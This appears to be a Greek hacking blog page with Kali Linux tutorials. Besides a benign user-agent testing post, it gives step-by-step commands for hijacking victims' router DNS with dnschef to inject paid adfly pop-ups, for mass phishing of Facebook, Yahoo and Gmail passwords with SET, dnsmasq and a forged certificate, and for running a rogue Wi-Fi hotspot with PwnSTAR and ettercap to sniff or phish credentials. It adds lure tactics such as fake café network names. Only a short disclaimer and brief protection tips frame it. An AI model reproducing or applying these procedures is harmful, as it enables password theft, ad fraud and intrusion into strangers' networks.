ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Εμφάνιση αναρτήσεων με ετικέτα Spoofing. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Spoofing. Εμφάνιση όλων των αναρτήσεων

Τρίτη 17 Νοεμβρίου 2015

Πως κοιταμε την ανταποκριση μιας ιστοσελιδας απο διαφορους τυπους περιηγητων


Τι θα χρειαστειτε;

1.Κali linux


Μερικες ιστοσελιδες δεν εχουνε την ιδια ανταποκριση(responce) σε ολους τους περιηγητες η λειτουργικα
πχ το facebook οταν μπεις απο το κινητο σου εχει αλλη ανταποκριση απο οταν  μπεις απο τον υπολογιστη σου
Τι κανει ομως το facebook να αναγνωριζει οτι ειναι κινητο η υπολογιστης;
Πολυ απλα απο το User-Agent που εχετε
πχ ενα UA εχει το εξεις string(στοιχειοσειρα)
Mozilla/5.0 (Windows 8.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

το συγκεκριμενο UA-string δηλωνει οτι ειναι ενας υπολογιστης με windows 8.1 64 bit και με περιηγητη Chrome 41.0.2
για καθε UA αναλυτικα κοιταξτε εδω

Για να καταλαβετε καλυτερα πως μας χρησιμευει να ξερουμε τα responce μιας ιστοσελιδας θα χρησιμοποιησουμε το UATester

Το UATester ειναι ενα εργαλειο το οποιο δοκιμαζει σε μια ιστοσελιδα διαφορα UA(User-Agents) και μας δειχνει τις απαντησεις, αυτο μας βοηθαει να δουμε αν το εργαλειο που βαλαμε να ανιχνευσει για ευπαθιες η ακομα για να τις εκμεταλευτει μπλοκαρετε


Οποτε ανοιγουμε ενα τερματικο και γραφουμε

ua-tester

βλεπουμε τις εντολες


πχ η σελιδα που θα δοκιμασουμε ειναι www.sail0r.wc.lt

παμε να την ανοιξουμε κανονικα απο το Iceweasel ,βλεπουμε οτι μας εχει ανακατευθυνει στο http://www.sail0r.wc.lt/error.html και μας λεει οτι απαγορευετε κτλ

κανουμε αλλη μια προσπαθεια με igognito mode για να δουμε μηπως ειναι τα cookies *(μερικες ιστοσελιδες μπλοκαρουνε με cookies ,βεβαια σε εμας το λεει ξεκαθαρα ΛΑΝΘΑΣΜΕΝΟΣ ΠΕΡΙΗΓΗΤΗΣ)

 και δεν μας επιτρεπει

οποτε τωρα θα δοκιμασουμε το UATester

γραφουμε στο τερματικο

ua-tester -u http://www.sail0r.wc.lt/ -v

στην αρχη το ua-tester δοκιμαζει μονο με UA Mozilla/5.0 το οποιο ολοι οι περιηγητες εκτος απο το Opera το εχουνε αρχικα στην στοιχειοσειρα (string)


μετα αρχιζει να δοκιμαζει διαφορα UAs

για iphone μας εκανε ανακατευθυνση (redirect)


ipad redirect


Android παλι redirect

Symbian παλι

Windows παλι


μετα απο καμια 10ρια αποτελεσματα βλεπουμε οτι UA σαν Playstation δεν μας κανει redirect


Για να καταλαβετε καλυτερα εχω ρυθμισει τον apache να κανει redirect σε windows,mac ,Linux,Android,Symbian ,θα μπορουσα να το ρυθμισω να κανει redirect σε αυτους τους περιηγητες Chrome ,Firefox και οχι στα ποιο πανω λειτουργικα

αν τρεξω το ua-tester με ενα δικο μου UA
πχ Mozilla/5.0 (Friteza; 2.4)

ua-tester -u http://www.sail0r.wc.lt -s "Mozilla/5.0 (Friteza; 2.4)"



τωρα για να ενωθουμε με την σελιδα θα χρησιμοποιησουμε το Burpsuite
αλλαζουμε το UA οπως στην  εικονα


μετα πηγαινουμε στις ρυθμισεις του iceweasel και επιλεγουμε σαν proxy 127.0.0.1 και θυρα 8081


τωρα ολα τα request και τα responce που κανει το Iceweasel θα περνανε μεσα απο το Burpsuite
το Burpsuite θα αλλαξει το UA και θα σας εμφανισει την σελιδα



*Αν θελετε να αλλαξετε το User-Agent σας μπορειτε επισης να εγκαταστησετε καποιο προσθετο στο Iceweasel/Firefox/Chrome

 

Δευτέρα 19 Ιανουαρίου 2015

Πως βγαζουμε λεφτα απο το διαδικτυο(Blackhat Technique)



Τι θα χρειαστειτε;

1.Kali linux

Σε προηγουμενους μου οδηγους μαθαμε πως να εισβαλουμε σε αγνωστα router
,πως να αλλαζουμε τον dns στο router του θυματος και πως να κανουμε dns hijacking αποσκοπωντας σε εισβολη στο συστημα τους και κλεψιμο κωδικων

Σε αυτο τον οδηγο θα σας μαθω πως να βγαζετε λεφτα απο αυτο

Παταμε εδω
Φτιαχνουμε ενα λογαριασμο και πηγαινουμε στην καρτελα Tools

κατω αριστερα επιλεγουμε popup ads  και αντιγραφουμε τον κωδικα στην κατω εικονα σε ενα αρχειο κειμενου

τωρα γραφουμε σε ενα τερματικο
  • curl ifconfig.me
και σημειωνουμε την εξωτερικη μας ip στο αρχειο κειμενου


γραφουμε
  • ifconfig
σημειωνουμε την εσωτερικη μας ip  στο αρχειο κειμενου


 τωρα πηγαινουμε στο router γραφωντας στην url του browser μας 192.168.1.1 η 192.168.2.1 η 192.168.1.254 (αναλογα ποια ειναι η ip του router σας)
κανουμε login πχ admin admin η οτι κωδικους εχει το δικο σας router

πηγαινουμε στις ρυθμισεις  επιλεγουμε dmz και βαζουμε την εσωτερικη μας ip


*Μπορειτε να προωθησετε τις θυρες 53,80,443 ενναλακτικα*

ανοιγουμε το burpsuite  απο το menu η γραφουμε σε ενα τερματικο burpsuite

κοιταξτε  προηγουμενο οδηγο οι ρυθμισεις πρεπει να ειναι ετσι

στην καρτελα proxy-options

Proxy Listeners

κατω Match and Replace επιλεγουμε Add
γραφουμε τα εξεις στοιχεια (στο replace κανουμε αντιγραφη το javascript απο το adfly)και επιλεγουμε Enable


κατω στο SSL Pass Through επιλεγουμε Add και ok


στην καρτελα Proxy - Intercept επιλεγουμε Intercept off


τωρα ανοιγουμε ενα τερματικο και γραφουμε

  • dnschef -i εσωτερικηip --fakeip=εξωτερικηip --truedomains=*google.gr

πχ στη κατω εικονα ειναι οταν εχουμε αλλαξει στο router του θυματος το dns και τρεχουμε το dnschef


*αλλαζουμε το dns στο θυμα με την εξωτερικη σας ip*
μπορειτε να το αλλαξετε η στο router του ωστε ολες οι συσκευες να περνανε απο εσας
η αν εχετε απομακρυσμενη προσβαση στον υπολογιστη του κατευθειαν (δειτε παλιοτερους οδηγους)
!Προσοχη μην ξεχασετε να εχετε βαλει και δευτερο dns στο θυμα πχ 8.8.8.8! 
αν θελετε να το δοκιμασετε στο δικο σας δικτυο τοτε αλλαξτε το dns σε μια συσκευη πχ κινητο,υπολογιστη,tablet κτλ (αλλα εφοσον ειναι στο τοπικο δικτυο σας δεν κανουμε καποια προωθησει θυρας και οι ρυθμισεις του dnschef ειναι:

dnschef -i εσωτερικηip --fakeip=εσωτερικηip --truedomains=*google.gr

τωρα οταν το θυμα κανει σερφαρισμα στο διαδικτυο σε σελιδες http θα του εμφανιζονται διαφορες διαφημισεις και θα περνετε λεφτα απο το adfly

πχ απο 3 router και με μια συνηθισμενη κινηση του δικτυου δλδ πανω απο 2-3ς συσκευες στο καθενα θα εχετε αυτα τα αποτελεσματα

Τετάρτη 15 Οκτωβρίου 2014

Πως κλεβουμε μαζικα κωδικους Facebook,Yahoo,Gmail με την μεθοδο dns hijacking (Expert Phising)



Τι θα χρειαστειτε;

1.Κali Λinux
2.Απομακρυσμενη προσβαση σε καποιο router


Οταν λεμε Dns hijacking ειναι οταν αλλαζουμε στο router η στη συσκευη του θυματος με ενα δικο μας dns server
δλδ αν ο χρηστης ψαχνει για www.facebook.com που ειναι ενα domain name
ο dns του θα του πει οτι το www.facebook.com βρισκετε στην ip 31.13.86.145
ενω αν αλλαξουμε στο router του θυματος και βαλουμε τον δικο μας dns server τοτε μπορουμε να βαλουμε οτι το www.facebook.com ειναι στην ταδε ip η οποια αυτη η ip ειναι η σελιδα phising που εχουμε φτιαξει

τωρα για να ξεκινησουμε αυτη την επιθεση
πρεπει να φτιαξουμε τον dns server μας και να φτιαξουμε και την σελιδα phising

Πριν αρχισουμε γραφουμε σε ενα τερματικο ifconfig


βλεπουμε οτι η εσωτερικη μας ip ειναι 192.168.1.4 σε εσας μπορει να ειναι κατι αλλο πχ 192.168.1.χ

τωρα ανοιγουμε το browser μας και γραφουμε 192.168.1.1 η 192.168.2.1 η 192.168.1.254 ωστε να ενωθουμε με το router μας
πηγαινουμε και επιλεγουμε firewall dmz και βαζουμε την εσωτερικη μας ip ,επιλεγουμε enable

αριστερα σημειωνουμε την public ip (εξωτερικη ip)

κλεινουμε το browser

τωρα σε ενα τερματικο γραφουμε

setoolkit

 επιλεγουμε 1
 επιλεγουμε 2
 επιλεγουμε 3
 επιλεγουμε 2
 γραφουμε την εξωτερικη μας ip

γραφουμε την ψευτικη σελιδα που θελουμε να φτιαξουμε πχ https://www,facebook.com/

 και παταμε enter


παταμε ctrl+c ωστε να κλεισει το SET
γραφουμε σε ενα τερματικο nano dns.conf μεσα γραφουμε

address=/facebook.com/εξωτερικηip


 παταμε ctr+x επιλεγουμε enter και αποθηκευουμε

τωρα ειμαστε ετοιμοι να ξεκινησουμε τον dns server μας ομως πριν το κανουμε αυτο επειδη το facebook ειναι https και σε ορισμενα browsers δεν θα εμφανιζει καν την σελιδα οποτε αναγκαστικα πρεπει να δημιουργησουμε ενα ssl πιστοποιητικο για την σελιδα phising που εχουμε φτιαξει με το SET
Το ssl certificate ειναι ενα πιστοποιητικο το οποιο κρυπτογραφει και φροντιζει την ασφαλη μεταφορα δεδομενων απο την σελιδα προς εσας  και φροντιζει να ταυτοποιει και να πιστοποιει την σελιδα 

*Προαιρετικο* οποτε γραφουμε σε ενα τερματικο

a2enmod ssl

και για να φτιαξουμε το πιστοποιητικο γραφουμε στο τερματικο
 
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/facebook.key -out /etc/ssl/certs/facebook.pem

και βαζουμε τα εξεις στοιχεια ωστε να φενεται αληθινο *δειτε μετα στο τελος*


 τωρα γραφουμε nano /etc/apache2/sites-available/default-ssl

πηγαινουμε λιγο κατω που λεει ssl engine το αλλαζουμε σε on και προσθετουμε τις γραμμες αυτες


παταμε ctrl+x  μετα y και enter για να αποθηκευσουμε

*Τελος προαιρετικου*
μετα γραφουμε στο τερματικο

service apache2 restart


τωρα ειμαστε ετοιμοι να τρεξουμε τον dns server μας με την εντολη

dnsmasq --no-daemon --log-queries -C dns.conf

τωρα εφοσον τα εχουμε ολα μια χαρα μας μενει να βρουμε τα θυματα

 σε προηγουμενο μου οδηγο σας εδειξα πως ανιχνευετε και εισβαλετε σε αγνωστα router οποτε ας πουμε οτι εχετε προσβαση στο ρουτερ καποιου
 τοτε θα αλλαξετε το dns server του με την δικια σας εξωτερικη ip δλδ


τωρα εφοσον αλλαξαμε τον dns  server στο αγνωστο router θα δουμε στο τερματικο που τρεχει ο dns server μας ολα τα domain που αναζητα καποιος απο το συγκκριμενο router και συγκεκριμενα θα δουμε την ανακατευθυνση του facebook πχ ο χρηστης με ip 193.xx.xx.xx ψαχνει το www.facebook.com
και ο dns server μας απανταει οτι ειναι στην ip 178.xx.xx.xx δλδ στην εξωτερικη μου ip που εχω την σελιδα phising


και οταν ο χρηστης η οι χρηστες βαλουνε τον κωδικο τους τοτε εσεις θα τρεξετε σε ενα τερματικο

cat /var/www/harvester*.txt
η tail -f  /var/www/harvester*.txt *για να μην τρεχετε συνεχεια την εντολη cat*

και θα σας τους εμφανισει


Αυτη η μεθοδος εφαρμοζετε καλυτερα σε δημοσια δικτυα πχ καφετεριες
Προσοχη σε μερικα browsers βγαζει οτι το πιστοποιητικο δεν ειναι εγκυρο γιατι πολυ απλα για την ψευτικη σελιδα facebook παρεχουμε ενα αλλο πιστοποιητικο και οχι το γνησιο
για να παρακαμψουμε αυτο πρεπει να κανουμε εγκατασταση το πιστοποιητικο στο θυμα μας πραγμα το οποιο ειναι αδυνατο εκτος και αν εχουμε απομακρυσμενη προσβαση η φυσικη
Ετσι οπως ειναι ο οδηγος εχει αποτελεσματα περιπου 85% βεβαια παρατηρησα οτι ειναι καλυτερο να μην βαζετε sll engine on και να εχετε την ψευτικη ιστοσελιδα σας χωρις ssl


Πως θα προστατευτειτε;

Απλα μην αφηνετε τους εργοστασιακους κωδικους στο ρουτερ σας γιατι ακομα και ενας κακοβουλος χρηστης να μην εχει απομακρυσμενη συνδεση με το ρουτερ σας μπορει να εχει απο την τοπικη συνδεση συνηθως αυτο γινετε σε καποια καφετερια η ακομα να εχει καποιον μολυσμενο με ιο χρηστη που ειναι στο δικτυο σας και να συνδεθει μεσω αυτου (δειτε προηγουμενους οδηγους)

Τετάρτη 26 Φεβρουαρίου 2014

Πως θα κλεβετε κωδικους απο τους γυρω σας (Rogue AP)



Tι θα χρεαστειτε;

1.Kali linux
2.PwnSTAR_0.9
3.να ειμαστε στο διαδικτυο συνδεδεμενοι με καλωδιο και να εχουμε ασυρματη καρτα εσωτερικη/εξωτερικη
η να εχουμε 2 ασυρματες καρτες δλδ μια εσωτερικη και μια εξωτερικη



Κατεβαζουμε το PwnStar εδω
οταν κατεβει το μετακινουμε στην επιφανεια εργασιας


ανοιγουμε ενα τερματικο και γραφουμε
cd Desktop
tar xvfi PwnSTAR_0.9.tgz
τωρα θα δουμε οτι το αρχειο PwnSTAR_0.9.tgz εχει αποσυμπιεστει
και θα δουμε στην επιφανεια εργασιας μας διαφορους φακελους
στο ιδιο τερματικο γραφουμε παλι για να μετακινησουμε τους φακελους στο /var/www

mv -f portal_hotspot /var/www/
mv -f portal_pdf /var/www/
mv -f portal_simple /var/www/
mv -f hotspot_3 /var/www/
πηγαινετε στην διαδρομη /var/www/ και ολοι οι φακελοι που μεταφερατε πρεπει να εχουνε δικαιωματα αναγνωσης και εγραφης
 

τωρα αφου τα μετακινησαμε γραφουμε
./PwnSTAR_0.9

τωρα θα σας εμφανιστει το menu


1)Honeypot απλα φτιαχνετε ενα ψευτικο ασυρματο δικτυο ενωνετε το θυμα και χρεισιμοποιειτε τα εργαλεια nmap,metasploit ετσι ωστε να εισβαλετε στον υπολογιστη του (δεν ειναι πολυ αποτελεσματικο γιατι εφοσον ο χρηστης δεν θα εχει internet τοτε θα αποσυνδεθει )

2)Grab WPA Handshake σας επιτρεπει να φτιαξετε ενα ψευτικο ασυρματο δικτυο και να πιασετε το handshake ετσι ωστε να το σπασετε με το aircrack-ng

3)Sniffing φτιαχνετε ενα ασυρματο δικτυο ενωνετε το θυμα και ολα τα πακετα περνανε απο εσας με συνεπεια να του κλεψετε ολους τους κωδικους κτλ

4)Simple Web server σας επιτρεπει να φτιαξετε ενα ασυρματο δικτυο και να δωσετε internet στο θυμα ,οταν το θυμα γραψει facebook,hotmail,yahoo,gmail κτλ θα τον ανακατευθυνει σε μια ψευτικη σελιδα υποχρεωνοντας των να βαλει τους κωδικους του για να συνεχισει την περιηγηση του στο διαδικτυο

5)Karmetasploit φτιαχνετε ενα ψευτικο ασυρματο δικτυο και με το που ενωθει το θυμα αν εχει καποια ευπαθεια στο metasploit τοτε μπορειτε να εισβαλετε στον υπολογιστη του

6)Browser_autopwn φτιαχνετε ενα ψευτικο ασυρματο δικτυο και με το που ενωθει το θυμα αν εχει καποια ευπαθεια στον περιηγητη του τοτε μπορειτε να εισβαλετε στον υπολογιστη του

οι βασικες λειτουργιες του αυτες ειναι εγω θα σας δειξω την επιλογη 3 και 4

Ας αρχισουμε

επιλεγουμε  3
στη συνεχεια θα μας ρωτισει αν αν θελουμε να δωσουμε στο θυμα μας συνδεση με το διαδικτυο επιλεγουμε y
μετα θα μας ρωτισει απο που ειμαστε ενωμενοι με το διαδικτυο wlan0 (ασυρματα) eth0 (ενσυρματα)

οπως βλεπετε στην πανω εικονα απο μονο του μου αλλαξε την mac address της ασυρματης καρτας μου
τωρα θα μας ζητησει να ξανασυνδεθουμε με το διαδικτυο απλα κανουμε αποσυνδεση και ξανασυνδεομαστε *ΠΡΟΣΟΧΗ μπορει να βλεπετε οτι ειστε αλλα καντε αυτο που λεει (ανοιξτε μια ιστοσελιδα για να διαπιστωσετε αν ειστε)
 


στη συνεχεια βαζουμε την ασυρματη καρτα μας που θα εκπεμπει το ψευτικο δικτυο
θα μας ζητησει να βαλουμε τυχαια mac address πατηστε y η με την επιλογη m  βαζετε συγκεκριμενη mac address

θα μας ζητησει να ανιχνευσουμε τα ασυρματα δικτυα γυρω μας ετσι ωστε να επιλεξουμε ενα ονομα απο τα γυρω μας ασυρματα δικτυα *συνηθως χρησιμοποιουμε αυτη την τακτικη αν θελουμε να επιτεθουμε σε συγκεκριμενο χρηστη που χρησιμοποιει το συγκεκριμενο ασυρματο δικτυο
 θελετε πατηστε y *μετα μεσα στο τερματικο που ανοιξε πατηστε ctrl+c για να επιστρεψετε εδω
εγω πχ πατησα n γιατι θα φτιαξω ενα ελευθερο (open authentication) δικτυο με ενα τυχαιο ονομα ετσι ωστε να μπορει να ενωθει οποιος θελει
εδω επιλεγουμε 3 και βαζουμε τον αριθμο του καναλιου που θελουμε να ειναι το ψευτικο δικτυο μας πχ 1

τωρα για την κρυπτογραφηση του δικτυου μας αν θελουμε μπορουμε να επιλεξουμε


Οpen δλδ να ειναι ελευθερο
WEP40 και πρεπει να βαλουμε 10 Hexidecimal χαρακτηρες
οι Ηexidecimal χαρακτηρες ειναι 0123456789ABCDEF
δλδ
260325ADE0
7717751F43
44B27CA075
7BCDAAD0D5
C84FF332E1
20856AB23B
WEP104 και πρεπει να βαλουμε 26 Hexidecimal χαρακτηρες
WPA/WPA2 ειναι για να πιασουμε το handshake ετσι ωστε να σπασουμε το δικτυο με aircrack-ng

Τωρα αν βαλετε wep απλα να ξερετε θα ενωθει καποιος που ξερει να σπαει ασυρματα δικτυα (το wep σπαει σε 1-2 λεπτα) οποτε απο αυτον θα κλεψετε κωδικους *συνδεστε το κιν σας στο ψευτικο ασυρματο δικτυο ετσι ωστε να βοηθησετε τον κακοβουλο χρηστη να το σπασει ποιο ευκολα

εγω επελεξα Open και c για συνεχεια
τωρα θα σας εμφανισει τις εξεις επιλογες


Blackhole απλα απανταει σε ολα τα probe *τα probe ειναι η προσπαθεια μιας συσκευης για να βρει το δικτυο που εχει συνδεθει προηγουμενως και για να το καταλαβετε καλυτερα πχ εγω ειμαι σπιτι μου και ανοιγω το ασυρματο στον υπολογιστη μου αυτοματα θα συνδεθει στο ασυρματο δικτυο του σπιτιου μου SPITIWIFI αν ομως παω σε μια αλλη τοποθεσια μακρια απο το σπιτι μου και ανοιξω το wifi του υπολογιστη μου αυτοματως ο υπολογιστης μου θα προσπαθει να ψαξει για το ασυρματο SPITIWIFI δλδ θα εκπεμπει  συνεχεια probes για το ασυρματο δικτυο SPITIWIFI .
Bullzeye απλα γραφουμε το ονομα του ασυρματου δικτυου που θα εκπεμπει το ψευτικο δικτυο μας

*η επιλογη Blackhole συνηθως χρησιμευει οταν εχετε γυρω σας ελευθερα ασυρματα δικτυα

εγω επιλεγω Bullzeye και γραφω ενα ονομα πχ jessica *γιατι ως γνωστο ενα ασυρματο δικτυο με γυναικιο ονομα σε κανει να πιστευεις οτι προφανως ο κατοχος του ειναι γυναικα και δεν ηξερε να κλειδωσει το δικτυο
η αν εχετε κοντα σας καμια καφετερια δωστε ονομα καφετεριας και γραψτε free_wifi πχ Cafe_free_wifi

αφου επιλεξετε το ονομα του δικτυου σας τοτε θα σας εμφανισει αυτο

*ποιο πανω αν θελετε αλλαζετε το ευρος των ip που θελετε να δωσετε στο θυμα,το υποδικτυο και το Gateway
επιλεγουμε c για να συνεχισουμε

επιλεγουμε y σε ολα και μας εμφανιζονται ολα αυτα τα παραθυρα


οταν ενωθει καποιος χρηστης θα δουμε πρωτα


οταν του δωσουμε ip



με το ferret θα δουμε ολες τις συνδεσεις του *αν θελετε μπορειτε να τρεξετε το wireshark με interface το at0

και τελος οταν το θυμα συνδεθει πχ τωρα στο facebook σας εμφανιζει τα κριτηρια συνδεσεις του

*οπως βλεπετε το παπακι @ το εμφανιζει με %40

Τωρα θα σας δειξω την διαφορα της επιλογης 4
στην ουσια ακολουθουμε τα ιδια βηματα απλα εφοσον ο προηγουμενος χρηστης ενωθηκε με το ψευτικο δικτυο Jessica θα προσπαθησω να το ξαναφτιαξω με ιδια mac address και το ιδιο ονομα ετσι ωστε να ενωθει παλι αυτοματα

οποτε προχωραμε οπως στα προηγουμενα βηματα

και συνεχιζω οπως τα προηγουμενα βηματα μεχρι να μου βγαλει αυτη την επιλογη


γραφουμε hotspot_3


και στην συνεχεια επιλεγουμε 1
*με την επιλογη 1 οτι και να γραψει στον περιηγητη του τοτε θα ανακατευθυνθει 
*αν θελουμε μπορουμε να επιλεξουμε 2 και να γραψουμε εμεις το host file δλδ
www.facebook.com,www.google.com
με λιγα λογια οταν το θυμα παει σε αυτες τις 2 τις σελιδες θα τoν ανακατεθυνει στην σελιδα μας και θα του εμφανιστει αυτο


τελος επιλεγουμε y και γραφουμε formdata.txt

οταν γραψει τα στοιχεια του
θα μας εμφανιστει στο παραθυρο
*τα στοιχεια αποθηκευονται στην διαδρομη /var/www/hotspot_3/formdata.txt
* αν σας παρουσιασει προβλημα το dnsspoof και δεν μπορει να ανακατευθυνει το θυμα σας στην σελιδα τοτε καντε το με το ettercap
απλα γραφετε σε ενα τερματικο
nano /etc/ettercap/etter.dns αλλαζετε εκει που λεει microsoft sucks
πχ οταν γραφει ο χρηστης για να μπει στο facebook


παταμε ctrl+x για να αποθηκευτει το αρχειο etter.dns
και τρεχουμε σε ενα τερματικο την εντολη
ettercap -T -q -i at0 -P dns_spoof


Πως να προστατευτειτε;

Απλα δεν συνδεομαστε ποτε σε ελευθερο ασυρματο δικτυο και αν πρεπει να συνδεθουμε τοτε πρεπει να εχουμε εγκατεστημενο στο brοwser μας https everywhere και κοιταμε το gateway να εχει την μορφη 192.168.1.254 η 192.168.2.1 η 192.168.1.1
επισεις αν ανοιξετε την γραμμη εντολων των windows και γραψετε tracert www.google.com θα σας βγαλει ολη την διαδρομη μεχρι να φτασετε στην σελιδα της google πχ εδω το θυμα ειναι  συνδεδεμενο με  το ψευτικο δικτυο μας

δλδ για να φτασει στην σελιδα google περναει τοπικα απο 192.168.0.1 (δλδ μεσω εμενα) και μετα 192.168.1.254 που ειναι το  ρουτερ περναει σε εξωτερικες ip
ενω εγω που ειμαι κανονικα συνδεδεμενος ξεκιναω κατευθειαν απο το ρουτερ